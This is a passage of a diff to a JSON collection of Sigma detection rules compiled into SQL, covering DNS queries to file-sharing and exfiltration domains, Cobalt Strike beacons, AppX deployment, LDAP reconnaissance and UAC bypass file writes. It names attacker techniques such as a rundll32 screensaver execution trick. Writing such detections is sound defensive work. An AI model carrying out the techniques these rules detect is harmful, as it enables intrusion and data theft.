Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Legitimate administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR 
TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1071.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - 
"filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Creation of an Executable by an Executable", - "id": "297afac9-5d02-4138-8c58-b977bac60556", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects the creation of an executable by another executable", - "author": "frack113", + "description": "Detects DNS queries for 
anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Software installers", - "Update utilities", - "32bit applications launching their 64bit versions" + "Rare legitimate access to anonfiles.com" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE 
'\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_dropper.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory 
enumeration via LDAP", + "author": "Adeem Mawani", + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR 
SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + ], + "filename": "win_ldap_recon.yml" + }, + { + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be 
processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by the local 
computer policy", + "author": "frack113", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE 
'\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 